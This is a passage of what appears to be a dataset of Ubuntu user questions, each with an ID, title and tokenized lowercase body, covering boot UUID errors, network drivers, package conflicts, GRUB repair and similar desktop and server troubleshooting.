i find that the uuid of the root partition is not that what the system mentioned while booting . to reconfirm i checked the listing of the directory /dev/disk/by-uuid . ( this is the directory that the above output mentioned in `` alert '' ) ubuntu @ ubuntu : ~ $ ll /dev/disk/by-uuid total 0 drwxr-xr-x 2 root root 220 jul 29 22:35 ./ drwxr-xr-x 6 root root 120 jul 29 22:35 ../ lrwxrwxrwx 1 root root 10 jul 29 22:35 0e441c8f441c7ba1 - > ../../sda2 lrwxrwxrwx 1 root root 10 jul 29 22:35 100eeceb0eeccb34 - > ../../sda3 lrwxrwxrwx 1 root root 10 jul 29 22:35 5dd68245-345c-44f4-8c22-a6779472e388 - > ../../sda5 lrwxrwxrwx 1 root root 10 jul 29 22:35 6e60f4d460f4a3cd - > ../../sda1 lrwxrwxrwx 1 root root 11 jul 29 22:35 735de76f-65f3-4963-ad0e-44a4a2b34e97 - > ../../sda10 lrwxrwxrwx 1 root root 10 jul 29 22:35 84e87924-cc93-45d9-82d3-39a925110a2b - > ../../sda6 lrwxrwxrwx 1 root root 10 jul 29 22:35 a3f24d77-7c45-4a3d-b153-478d8261c338 - > ../../sda9 lrwxrwxrwx 1 root root 10 jul 29 22:35 bc426250-9c5d-4d9e-8b15-43bafa7bb4ac - > ../../sdb1 lrwxrwxrwx 1 root root 10 jul 29 22:35 f607795c-5f8c-4c14-a4d8-2d0e71d0319a - > ../../sda8 ubuntu @ ubuntu : ~ $ so , what 's that alert - alert ! /dev/disk/by-uuid/da5b7ccd-e161-4460-4012-1b54eaf31faa does n't exist ? what does n't exist ? just to troubleshoot : yesterday before the issue happened , i 'd booted live usb of ubuntu 14.04.1 . then i mounted the partitions of ubuntu 13.10 of my hard disk . can the problem occur had i not unmounted them before shutting down my system or was it that the system was n't properly shutdown ! ! i do n't know what had happened . i was going to install ubuntu 14.04.1 on my laptop to get the things working back but thought to see if it it can be resolved now only because i never expected my system to get broken this way . i 'd earlier faced issues with booting but that was bootloader thing that i learned to resolve ; this issue i want to get it resolved too so that suppose next time anything like this happens , i do have the solution . it was fortunate that i 'd bootable usb having ubuntu 14.04.1 beside me this time from which i 've booted ( live install ) & writing this question .
504978	how to set proxy in synaptic package manager ?	i am using synaptic package manager in ubuntu 14.04 . how to setup proxy in synaptic package manager ?
504979	wired and wireless not working after clean install . 14.04.1	i have a problem with my acer aspire e15 511 laptop . i installed xubuntu 14.04.1 on it . the wired and wireless worked in the bootable usb `` try '' edition , but not in the final installation . though the various wireless networks do show up , i 'm not able to connect . i´ve tried another fresh install , installing ubuntu 14.04.1 and mint 17 . the same issue persists across these distros . now i´m back to xubuntu 14.04.1 i´ve tried various methods of resolving , and found some fixes , messed around with firmware , .deb files offline installs , the nonfree packages , tried installing without updates and third party software . output of lspci : 00:00.0 host bridge : intel corporation valleyview ssa-cunit ( rev 0e ) 00:02.0 vga compatible controller : intel corporation valleyview gen7 ( rev 0e ) 00:13.0 sata controller : intel corporation valleyview 6-port sata ahci controller ( rev 0e ) 00:14.0 usb controller : intel corporation valleyview usb xhci host controller ( rev 0e ) 00:1a.0 encryption controller : intel corporation valleyview sec ( rev 0e ) 00:1b.0 audio device : intel corporation valleyview high definition audio controller ( rev 0e ) 00:1c.0 pci bridge : intel corporation valleyview pci express root port ( rev 0e ) 00:1c.1 pci bridge : intel corporation valleyview pci express root port ( rev 0e ) 00:1f.0 isa bridge : intel corporation valleyview power control unit ( rev 0e ) 00:1f.3 smbus : intel corporation valleyview smbus controller ( rev 0e ) 01:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) 01:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 12 ) 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) the output of ifconfig : eth0 link encap : ethernet hwaddr f8 : a9:63:75 : bb:8a up broadcast multicast mtu:1500 metric:1 rx packets:9 errors:0 dropped:0 overruns:0 frame:0 tx packets:71 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4780 ( 4.7 kb ) tx bytes:13445 ( 13.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:52 errors:0 dropped:0 overruns:0 frame:0 tx packets:52 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4016 ( 4.0 kb ) tx bytes:4016 ( 4.0 kb ) wlan0 link encap : ethernet hwaddr b8 : ee:65 : bd:6e : da inet6 addr : fe80 : :baee:65ff : febd:6eda/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:13 errors:0 dropped:0 overruns:0 frame:0 tx packets:33 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3789 ( 3.7 kb ) tx bytes:6884 ( 6.8 kb ) the output of iwconfig : wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . sudo lshw -c network [ sudo ] password for simon : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.1 bus info : pci @ 0000:01:00.1 logical name : eth0 version : 12 serial : f8 : a9:63:75 : bb:8a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-2_0.0.1 07/08/13 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:106 ioport:1000 ( size=256 ) memory:90504000-90504fff memory:90500000-90503fff *-network description : wireless interface product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : b8 : ee:65 : bd:6e : da width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-32-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:90400000-9047ffff memory:90480000-9048ffff
504980	bugzilla in ubuntu 12.04 server	i am trying to install bugzilla on my ubuntu 12.04 64 bit server machine . i am following these steps . the problem is that i am not able to find the localconfig file in the bugzilla folder or can i say the ./checksetup.pl is not generating the config file . what am i supposed to do ? i am using : apache2 version - 2.2.22 mysql version - ver 14.14 distrib 5.5.38 perl version - v5.14.2
504984	minecraft bukkit server spams logfile - ubuntu 12.04	i have a virtual server ( ubuntu 12.04 ) and a serious problem with minecraft/bukkit . i 've installed a fresh bukkit 1.6.4 on my virtual server and made some upstart script for it . here is the /etc/init/minecraft-server.conf start on runlevel [ 2345 ] stop on runlevel [ ^2345 ] console log chdir /srv/minecraft/server-kronos setuid minecraft setgid minecraft respawn respawn limit 20 5 exec java -xms1024m -xmx1536m -jar craftbukkit.jar -o true -- log-limit 1000 if i start the server via initctl start minecraft-server the server itself runs fine and i can play on it but the logfile is spammed extremely fast . everytime it is started , it generates like 1 mb/s ( ! ! ) of data in the logfile . the logfile /var/log/minecraft-server.log looks like this : < < < < < < < < < < < < ... the server spams millions of these `` < `` symbols in the logfile . any ideas ? help would be highly appreciated : )
504985	update failing ( index failed to download )	i 'm using ubuntu 12.04 . here 's the message i 'm getting in terminal : w : failed to fetch gzip : /var/lib/apt/lists/partial/au.archive.ubuntu.com_ubuntu_dists_precise-backports_main_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . how to solve this ?
504987	libreoffice ( calc ) consumes all of the available ram memory	i am having problems with libreoffice 's memory consumption . it did n't change much since 12.04 - i have tested it in ubuntu 12.04 , 13.04 , 13.10 and 14.04 and did n't notice any significant differences . what happens is that on some actions after few minutes soffice.bin starts to consume up to 3,9 gb of memory , which is the maximum amount available , and then the disk has to swap , which makes my computer almost unresponsive . now i am trying to perform a very basic operation - there are two opened windows and i am copy-pasting some parts of the first spreadsheet to the second one . auto-saving is turned off , graphics hardware acceleration as well , swappiness is now on 0.1 . basically , everything that is mentioned in similar articles has been done , but it does n't help much . i have also tried to do it on two different computers ( 13.10 and 14.04 ) , but it 's the same there . am i missing something that can be done to address this problem ? if it 's not possible to solve this , is there any good alternative on ubuntu ? edit : the second document has multiple sheets , 100-200 of them , depending on the document .
504988	how can i check for symlinks and hardlinks before a mv ?	i need to attempt a large folder replacement on a legacy system . i would like to mv the orginal folder to a new location , replace it with another , but revert back on the original if the replacement does n't work . i am concerned that the original folder may contain symlink and hardlink sources and/or targets , and that the mv forward or back will break these one way or another . how can i : check that the folder to mv does not contain any symlink/hardlink sources check that the folder to mv does not contain any symlink/hardlink targets mv it so that if i have to mv it make , nothing will break ls -il seems to be a potential solution , but the number of files is very large , so i 'd prefer to find a better way . ( otherwise , i was planning on writing a script to parse the output of ls -il . )
504989	upgrade ubuntu to edubuntu without connection and without dvd reader	i have an old notebook acer travelmate 200 series mod 1903 with windows millenium . it reads only cd , not dvd and ca n't boot from usb . it can not connect to the internet , it is located in a little town in kenia . i need to install ubuntu ( english ) , deleting windows from cd , and then add all levels of edubuntu school : ubuntu-edu-preschool ubuntu-edu-primary ubuntu-edu-secondary ubuntu-edu-tertiary how to download all packages ?
504991	how to remove a url shortcut from the unity panel	i have ubuntu 12.04 . i was watching a video on chromium and i went up to the global menu and there was an option of create app shortcuts . i tried it and now i want to remove it . i added it to the launcher , not the desktop . how do i get rid of it ? when i search the title of the video on the dash home i can find it but i do n't know how to get rid of it .
504992	how to install ubuntu-14.04.1 32-bit	i 'm the new to ubuntu . recently , i downloaded the iso image ( 32-bit ) . i have a laptop in which windows 7 is pre-installed and now i want to install ubuntu alongside windows 7 . i have burned a dvd for it but i do n't know how to install it .
504994	ppa : grails installation error	i have tried installing grails using : sudo add-apt-repository ppa : groovy-dev/grails sudo apt-get update sudo apt-get install grails-ppa the first command returns without errors : $ sudo add-apt-repository ppa : groovy-dev/grails grails is an advanced and innovative open source web application platform that ... more info : https : //launchpad.net/~groovy-dev/+archive/ubuntu/grails press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpt59mo9/secring.gpg ' created gpg : keyring `/tmp/tmpt59mo9/pubring.gpg ' created gpg : requesting key 02a9ec29 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpt59mo9/trustdb.gpg : trustdb created gpg : key 02a9ec29 : public key `` launchpad ppa for groovy developers '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok but the update command fails : $ sudo apt-get update ... err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en w : failed to fetch http : //ppa.launchpad.net/groovy-dev/grails/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . any idea why the ppa update fails with a 404 error ?
504999	hibernate on lid close	i want my laptop to hibernate when i close the lid . i can only choose between suspend and nothing , and both do nothing actually when i close the lid and open it nothing 's changed . i also tried sudo pm-hibernate and nothing happed . i tried dconf tools and tweak tool , i set it to hibernate but no change . also tried handlelidswitch=hibernate still no success , and i also tried enabling hibernation in polkit .
505000	i can not boot from any device except hdd	my notebook does not execute any bootable dvd or usb at all . but notebook is running with con windows . i have asked this question some people , and they told me my notebook is not ok , it is an old one . i want to know if i can install ubuntu from windows .
505004	permissions problems with apache2 alias	i 'm trying to set up a local installation of a scientific pipeline ( the trans protoemic pipeline ) . this pipeline use a number of cgi scripts and i 'm trying to match it 's requirements by setting up a number of aliases in my apache config . however , i get permissions errors ( 403 forbidden ) . to get to the bottom of this i 've set up a minimal virtualhost : < virtualhost *:80 > alias /thisworks /var/www/tpp # permission problem , permissions have been set to 755 and owner is www-data alias /tpp /usr/local/tpp < directory `` /usr/local/tpp '' > allowoverride none options all order allow , deny allow from all < /directory > < /virtualhost > at this point i would be glad just to get a directory listing for /usr/local/tpp . i 've set the owner of /usr/local/tpp to www-data and set the read write permissions to 755 for all files . i have no trouble accessing them as any user in bash . neither selinux or apparmor are running so they should n't affect this . i 've got exactly the same setup working on centos but ca n't get this to work on ubuntu .
505007	ubuntu gnome 14.04 disable touchpad while typing not working	i am using ubuntu gnome 14.04 . the `` disable touchpad while typing '' setting in the system settings does not work . any permutation of the `` syndaemon '' command does not work . it is really annoying , when i am typing all of a sudden the focus will be on a new window , or a large chunk of text will be gone , etc . i am using a dell inspiron 14 5000 series laptop , no proprietary drivers being used . i also tried installing pointing devices from the software center and disabling from there . did not work either . there 's the answer to this question : touchpad issue : jumping cursor while typing ( ubuntu 14.04 ) , syndaemon do n't help but i do n't want to try recompiling drivers unless there is definitely no other solution . also there 's this : https : //gist.github.com/silverhammermba/a231c8156ecaa63c86f1 but this also involves patching drivers ( also not clear how to apply it ) . how can i get this to work ?
505008	will hwe update be pushed out automatically after aug. 7	i 've been reading up on hardware enablement stack ever since i got the warning a few days ago . i was not aware of the hwe support cycle prior to this and i have various virtual machines running either 12.04.02 , 12.04.03 , or 12.04.04 . i update the machines using sudo apt-get update & & sudo apt-get upgrade . currently this updates and then after reboot i get the message about the end of support and instructions to update . after aug. 7 will my standard update routine automatically update the hwe stack for any machines that are using an eol hwe stack ? if not , will the same instructions supplied in the message still work to update the hwe stack ? this is the message i keep talking about : your current hardware enablement stack ( hwe ) is going out of support on 08/07/14 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . for more information , please see : http : //wiki.ubuntu.com/1204_hwe_eol to upgrade to a supported ( or longer supported ) configuration : * upgrade from ubuntu 12.04 lts to ubuntu 14.04 lts by running : sudo do-release-upgrade or * install a newer hwe version by running : sudo apt-get install linux-generic-lts-trusty linux-image-generic-lts-trusty and reboot your system .
505009	can not find libglade2 for ruby	i 'm using 12.04 and try to run ruby 1.8 code that calls libglade2 library . in the ruby code : require libglade2 but ruby says it can not find it ( loaderror ) . i searched for it but could not find it . could you tell me how i can install it in order to run the ruby code ?
505010	is it possible to underclock or set a frequency to intel hd 4000 ( igp )	i have a samsung np530 ultrabook and it run very hot and loud when the igp is in use ( eg . on google maps with 3d building , etc ... ) . i do n't need a lot of power and i prefer when i work in silence so i already activate powersave governor for the cpu and limit its frequency to 800mhz . even with a high cpu load it keep cool but i did n't find anything to keep cool the gpu ( hd 4000 ) . so is it possible to underclock or set a frequency to intel hd 2/3/4000 ( igp ) to keep it cool ?
505011	reinstalling boot loader after linux partition removal	the process : i had a windows 7 partition and an ubuntu 11.04 partition on the same hdd . ( 35gb windows 7 , 400gb data , 15gb free for linux ) . windows 7 was installed first , then ubuntu with grub loader . in windows 7 , i removed the ubuntu partition ( carelessly , i must admit ) to resize it , and reinstall a clean ubuntu 14.04 . in the process , it killed grub ( and i do n't remember on which partition it was installed ) . i was unable to boot windows 7 anymore . so i managed to get a windows 7 rescue shell and prompt some bootrec /fixmbr and now i can boot normally on windows 7 . problem is : windows 7 rescue disk and stuff can not detect any windows 7 installation on my hd . bootrec /scanos or /rebuildbcd tells me 0 windows installation found ! ubuntu 14.04.1 installer can not find my windows 7 installation / partition either ! ( and suggests a full erase disk & install , which is no good . ) how can i fix my windows 7 boot ? how do i reinstall grub ? or ubuntu , keeping my windows 7 partitions ? i 'm ok with installing a more aggressive linux distro ( but which one ? ) capable of detecting/cleaning my boot loaders and then reinstall grub , and then i 'll reinstall ubuntu over it . thanks
505013	equivalent to os x two-finger scroll ?	is there a ubuntu or linux equivalent to the two-finger scrolling in os x ? what i mean by that is not just reverse-direction scrolling or two-finger gestures sending scroll button events , but rather the fact that the scroll position will perfectly follow your finger position while held , accelerate realistically when you swipe and release , and also stop immediately when tapped again .
505016	how to fix : error report `` permission error ( 13 , 'access denied ' ) '' on chrome gpu process crash ?	i am getting chrome crashes that can not be reported ( as i understand 'permission error ' ) . these are gpu process crashes while no blacklist overriding and default chrome : //flags . what i want to know is how to enable error report for this problem . use sudo or group somewhere , i do n't know ... screenshot : would be nice to also know how to avoid those crashes . edit : system spec . ubuntu 14.04 lts x64 chrome 36.0.1985.125 proc / graphics : amd e2-1800 apu with radeon ( tm ) hd graphics ă 2 ^ driven by fglrx-updates package / vesa hondo edit2 : chrome : //gpu default flags ( as html pages ) : before crash https : //c11fbf01d63d06741cc45a90608f0e7d75f13312.googledrive.com/host/0b9qkeujf78r0zklvuvlouuxleja/gpu_before-crash_default-flags.html after crash https : //c11fbf01d63d06741cc45a90608f0e7d75f13312.googledrive.com/host/0b9qkeujf78r0zklvuvlouuxleja/gpu_after-crash_default-flags.html actually i see the same permission error for archive manager crash .
505018	example wordpress content from github missing for juju charm	i 'm looking into using the wordpress juju charm but am blocked right from the get go because the link they give http : //github.com/jujutools/wordpress-site for what a wordpress site should look like does n't exist . does anybody know what the new repo is ? i 've tried searching at github and on the juju site without any luck . the setting in the charm that i 'm referring to is : wp-content ( string ) this is a full repository path to where the wordpress wp-contents can be found . at this time git , bzr , svn , and hg are supported . an example of what a wp-content repository should look like can be found at http : //github.com/jujutools/wordpress-site .
505025	xfdesktop -- windowlist works only sporadically when called from xbindkeys	i have xbindkeys setup to show the xfce window list when i press the thumb button on my mouse . here 's my ~/.xbindkeysrc : # thumb button on mouse brings up the window list '' xfdesktop -- windowlist '' b:10 it works about once every twenty button presses , regardless of which monitor or window i click on . i already edited the command to write the return code of xfdesktop to a file , but it always returned 0 , also there never was any output ( like errors ) from the xfdesktop command , even when it did n't actually bring up the window list . when called via leopard shortcut or terminal , it works fine every time . so the problem seems to be something about the combination of xbindkeys and xfdesktop . edit : when run in gdb , it works every time . it also works when i change the command to sleep 0.1 ; xfdesktop -- windowlist , for whatever reason . so i 've got it working now , though i still have n't got a clue why it did n't work before .
505029	how do i tell if my brute force protection ( fail2ban ) is running ?	i 'm not sure if my fail2ban is running . how can i tell if it 's currently running ? also , how do i tell if it is even running on startup ?
505030	how do i revert updates to get to a usable gui	i 've been using 14.04 for a while and everything seems running smooth , until last night i downloaded updates.afterwards i restarted and a message like a reminder or new email type message popped up saying i was locked out of my account ( i was online and i think the message revered to my email or ubuntu one account , sad to say it would only go as far as the login window after which it hangs with my screensaver.i am new to ubuntu and do n't know the terminal so good , the tty i get to when pressing ctrl + alt f2 ca n't log in either , it says login incorrect.i can only get in when i drop to the shell in the grub recovery menu.can somebody talk me through a procedure .
505031	kubuntu : backlight problem on vostro 3555 ( radeon hd 6520g )	having recurrent trouble running ( k ) ubuntu on a dell vostro 3555 using a radeon hd 6520g chipset , i 'd solved those on 13.10 , re-installing the proprietary driver ( because the resume on lid open and resume after sleep were not functionning with the free drivers ) . but since the upgrading to 14.04 ( kubuntu still ) i can not have it working nicely , wether with free drivers ( no open gl , 3d , no resuming after sleep or lid closing/opening ... ) , and neither with fglrx proprietary drivers ( things work more or less , but after resuming from sleep or pause i have a very low backlight , no control on the brightness via menus or function keys until i logout/login ) so , if somebody would suggest a solution i would be quite happy of it because spending time searching for solution is not my favourite hobby , my linux/computing skills are restricted to a short knowledge and comprehension , sorry about that ! ! !
505033	hard disk usage	i just installed ubuntu 14.04.1 64 bit in my laptop . i used the entire disk ( 500 gb ) . now the disk looks like this : filesystem partition1 496gb ext4 extended partition2 4.3gb swap partition5 4.3gb free space 1.1mb to the best of my knowledge , there should have been only two partition , incl . swap . i had kubuntu installed previously . what is the reason behind this ?
505038	ca n't login after sleep ( ubuntu 14.04 )	i 've got ubuntu 14.04 installed on my laptop ( lenovo z570 ) , and it is fully updated . the trouble is that when i wake it from a sleep long enough to require entering my password to login , it wo n't let me enter my password . the field is there , and the cursor is blinking , but nothing happens when i type . the pointer works , so i can switch users to get back in , but that 's the only way i can get to login .
505041	where do i find all the apps that run during startup on ubuntu 12.04 ?	where do i find the file that dictates which apps run during boot up ? i want to add a script i made to run on bootup .
505048	network problem : chrome would not load sites that firefox does	i am running a ubuntu 13.04 . i had both chrome and firefox installed , and the former does not load most websites . there is no proxy , and i have disabled the firewall . i connect to the internet directly through ethernet port . the computer is in the office , i do not have access to any other hardware ( routers and the sort ) . this is the output of certain network commands : root @ i39549 : ~ # iptables -t filter -- list chain input ( policy accept ) target prot opt source destination ufw-before-logging-input all -- anywhere anywhere ufw-before-input all -- anywhere anywhere ufw-after-input all -- anywhere anywhere ufw-after-logging-input all -- anywhere anywhere ufw-reject-input all -- anywhere anywhere ufw-track-input all -- anywhere anywhere chain forward ( policy accept ) target prot opt source destination ufw-before-logging-forward all -- anywhere anywhere ufw-before-forward all -- anywhere anywhere ufw-after-forward all -- anywhere anywhere ufw-after-logging-forward all -- anywhere anywhere ufw-reject-forward all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination ufw-before-logging-output all -- anywhere anywhere ufw-before-output all -- anywhere anywhere ufw-after-output all -- anywhere anywhere ufw-after-logging-output all -- anywhere anywhere ufw-reject-output all -- anywhere anywhere ufw-track-output all -- anywhere anywhere chain ufw-after-forward ( 1 references ) target prot opt source destination chain ufw-after-input ( 1 references ) target prot opt source destination chain ufw-after-logging-forward ( 1 references ) target prot opt source destination chain ufw-after-logging-input ( 1 references ) target prot opt source destination chain ufw-after-logging-output ( 1 references ) target prot opt source destination chain ufw-after-output ( 1 references ) target prot opt source destination chain ufw-before-forward ( 1 references ) target prot opt source destination chain ufw-before-input ( 1 references ) target prot opt source destination chain ufw-before-logging-forward ( 1 references ) target prot opt source destination chain ufw-before-logging-input ( 1 references ) target prot opt source destination chain ufw-before-logging-output ( 1 references ) target prot opt source destination chain ufw-before-output ( 1 references ) target prot opt source destination chain ufw-reject-forward ( 1 references ) target prot opt source destination chain ufw-reject-input ( 1 references ) target prot opt source destination chain ufw-reject-output ( 1 references ) target prot opt source destination chain ufw-track-input ( 1 references ) target prot opt source destination chain ufw-track-output ( 1 references ) target prot opt source destination root @ i39549 : ~ # ifconfig eth0 link encap : ethernet hwaddr c8:1f:66 : a7 : ed:5c inet addr:10.4.3.174 bcast:10.4.255.255 mask:255.255.0.0 inet6 addr : fe80 : :ca1f:66ff : fea7 : ed5c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3165125 errors:0 dropped:0 overruns:0 frame:0 tx packets:246303 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:779916007 ( 779.9 mb ) tx bytes:28964602 ( 28.9 mb ) interrupt:20 memory : f7e00000-f7e20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:17170 errors:0 dropped:0 overruns:0 frame:0 tx packets:17170 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1568486 ( 1.5 mb ) tx bytes:1568486 ( 1.5 mb ) root @ i39549 : ~ # cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 i39549 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes root @ i39549 : ~ # cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search utadeo.edu.co root @ i39549 : ~ # arp -a et0021b7f27301.local ( 169.254.1.2 ) at 00:21 : b7 : f2:73:01 [ ether ] on eth0 portatilrok.utadeo.edu.co ( 10.4.3.213 ) at a4:1f:72:8b:47 : c4 [ ether ] on eth0 i37386.local ( 10.4.1.61 ) at a8:20:66:06:6d : b1 [ ether ] on eth0 et000400c16250.local ( 10.4.5.88 ) at 00:04:00 : c1:62:50 [ ether ] on eth0 i58068.utadeo.loc ( 10.4.1.232 ) at 00:26:2d:1f:88:9a [ ether ] on eth0 et0021b7cc3789.local ( 169.254.1.10 ) at 00:21 : b7 : cc:37:89 [ ether ] on eth0 ? ( 10.4.0.1 ) at 00 : e0 : b1:66 : b5:60 [ ether ] on eth0 i36903.utadeo.loc ( 10.4.1.7 ) at d4:9a:20 : ec : f2:7e [ ether ] on eth0 et000400c1c2b5.local ( 10.4.5.86 ) at 00:04:00 : c1 : c2 : b5 [ ether ] on eth0 i36915.utadeo.loc ( 10.4.1.190 ) at a8:20:66:06:6c : d3 [ ether ] on eth0 root @ i39549 : ~ # ping localhost ping localhost ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from localhost ( 127.0.0.1 ) : icmp_seq=1 ttl=64 time=0.026 ms 64 bytes from localhost ( 127.0.0.1 ) : icmp_seq=2 ttl=64 time=0.028 ms 64 bytes from localhost ( 127.0.0.1 ) : icmp_seq=3 ttl=64 time=0.053 ms ^c -- - localhost ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 1998ms rtt min/avg/max/mdev = 0.026/0.035/0.053/0.014 ms root @ i39549 : ~ # ping www.google.com ping www.google.com ( 74.125.229.211 ) 56 ( 84 ) bytes of data . 64 bytes from mia04s05-in-f19.1e100.net ( 74.125.229.211 ) : icmp_seq=1 ttl=55 time=46.8 ms 64 bytes from mia04s05-in-f19.1e100.net ( 74.125.229.211 ) : icmp_seq=2 ttl=55 time=46.3 ms 64 bytes from mia04s05-in-f19.1e100.net ( 74.125.229.211 ) : icmp_seq=3 ttl=55 time=45.9 ms ^c -- - www.google.com ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2002ms rtt min/avg/max/mdev = 45.958/46.379/46.841/0.438 ms any ideas on what may be wrong ? i 've already tried this : browsers are lagging to load some webpages without any effect .
505049	ubuntu 14.04 - you have held broken packages	this is a very popular question , but bare with me as i have tried teverything you are all about to suggest . so this is what i get : sudo apt-get install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : ubuntu-desktop : depends : ubuntu-session but it is not going to be installed depends : unity-control-center but it is not going to be installed depends : unity-settings-daemon but it is not going to be installed recommends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages . so i try to install unity-control-center depends : unity-settings-daemon but it is not going to be installed so i try to install unity-settings-daemon depends : gnome-settings-daemon-schemas ( < 3.10 ) but 3.12.2-0ubuntu1~trusty2 is to be installed the root problem appears to be that gnome-settings-daemon-schemas version 3.10 or less is needed , but it ca n't get it for some reason . so you might be thinking try the following : sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade sudo apt-get clean sudo apt-get autoclean sudo dpkg -- configure -a sudo -f i am currently logged into gnome , when i try to boot into lightgdm the system hangs right after something about printer spooling . i currently have gdm , kdm and lightgdm . i want my computer back to just gnome and ubuntu unity . any thoughts ? ( a re-install is out of the question )
505050	how can i allow a user to edit a specific system file normally restricted to root ?	i am trying to write to /etc/network/interfaces with a user that does not have root privileges . the reason for wanting to write to this would be to allow the user to set a static ip since i am running a command line only server . what permission do i need to give user in etc/sudoers ? i do not want the user to have full root permissions . just ability to edit this file .
505059	eclipse wo n't start	i 've just installed the latest version of ubuntu ( 14.04 ) and eclipse from the software-center . when i try to launch it , i just see the small welcome screen `` eclipse 3.8 ( c ) copyright ... etc '' , but nothing more happens . i 've already restarted the system , but it did n't help . could java be the problem ? there was openjdk installed .
505061	video tearing nvidia gt 540m dual screen	ill get right to the point : i have a laptop ( aspire 5750g ) that i run dual screen on ( the built in display and a samsung syncmaster 2043bw ) . im running ubuntu 14.04 ( installed yesterday ) on a nvidia gt 540m with the nvidia-331 driver with nvidia-prime installed . i have also tried other proprietary nvidia drivers from the repository with same results . i 've been busting my head in the ccsm and nvidia-settings trying to solve a dubious tearing issue : if i have the nvidia driver disabled everything works smoothly , however when i activate it i notice tearing happening at the edges of windows as i drag them around , and also lag . i keep thinking it`s a vertical sync issue and i broke x over 30 times trying to fix it , so i decided to finally ask for help . what is to be noted is that i also had the unknown display issue ( mentioned here ) , and that my nvidia-settings gui does not detect any displays . i have sync to vblanc active in both ccsm and nvidia-settings , but disabling it has no impact . i have detect refresh rate set in ccsm and it`s now at 50 , but it does n't make any difference if i set it manually , and i ca n't seem to find a place to set this in the nvidia-settings . let 's give you some data to work with : xrandr screen 0 : minimum 8 x 8 , current 3046 x 1050 , maximum 16384 x 16384 lvds-0 disconnected primary ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) lvds1 connected 1366x768+1680+218 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1680x1050+0+0 459mm x 296mm 1680x1050 59.9*+ 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 hdmi1 disconnected dp1 disconnected virtual1 disconnected xorg.conf section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` intel '' driver `` intel '' busid `` pci:0 @ 0:2:0 '' option `` accelmethod '' `` sna '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` pci:1 @ 0:0:0 '' option `` constraincursor '' `` off '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' option `` allowemptyinitialconfiguration '' `` on '' option `` ignoredisplaydevices '' `` crt '' endsection gpu-manager.conf - i have disabled it because it kept overwriting xorg.conf # start on ( starting lightdm # or starting kdm # or starting xdm # or starting lxdm 